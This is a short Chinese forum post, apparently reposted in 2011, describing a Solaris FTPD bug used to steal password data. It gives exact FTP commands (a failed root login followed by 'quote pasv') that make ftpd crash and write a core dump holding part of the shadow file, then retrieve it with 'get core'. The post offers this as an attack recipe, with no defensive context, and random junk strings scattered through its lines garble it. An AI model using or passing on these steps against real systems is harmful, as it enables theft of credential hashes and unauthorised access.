該方法利用了Solaris 操作系統(tǒng)中FTPD的一個(gè)BUG��,使得用戶可以獲得該機(jī)的口令文件�。具體過程如下:
) J7 \- H6 Y6 Y2 S% M: P
" p4 s* Y* y" V( T1 S. Q' X$ _1.通過 ftp 正常登錄到目的主機(jī)上& O) t4 e2 M& N) g6 m
) G+ n4 U3 d7 h
2.輸入如下命令序列:
. j0 m4 z( x. E- \$ N1 e8 Q/ l; G$ W) ^ x+ E
ftp> user root wrongpasswd `, ~4 _: u8 w( C8 z" A' r7 O; g
4 f: p/ t1 Y9 C
ftp> quote pasv
) I% L& L4 j3 C2 Z! @( ?2 T; h
* {6 g: u/ |' l1 r3.這時(shí),ftpd會(huì)報(bào)錯(cuò)退出��,同時(shí)會(huì)在當(dāng)前目錄下生成一個(gè)core���,口令文件就包含在這個(gè)core中���。! x* {/ E6 U( _8 {
& Z; s$ h* i5 y( n4.再次進(jìn)入FTP >get core& L3 v: P. ~8 w; l+ ~
" s# o, r) ^, `2 O) |
補(bǔ)充:雖然在core只有一部分shadow,但是對(duì)于系統(tǒng)來說已經(jīng)是致命的打擊了
; X% e5 H3 f- e0 Q. b" v" z2 l* P( r, F s% Z+ P% o9 m! ~2 e
|
發(fā)表于 2011-1-12 21:01:38
QQ好友和群
QQ空間
提升卡
置頂卡
沉默卡
喧囂卡
變色卡
顯身卡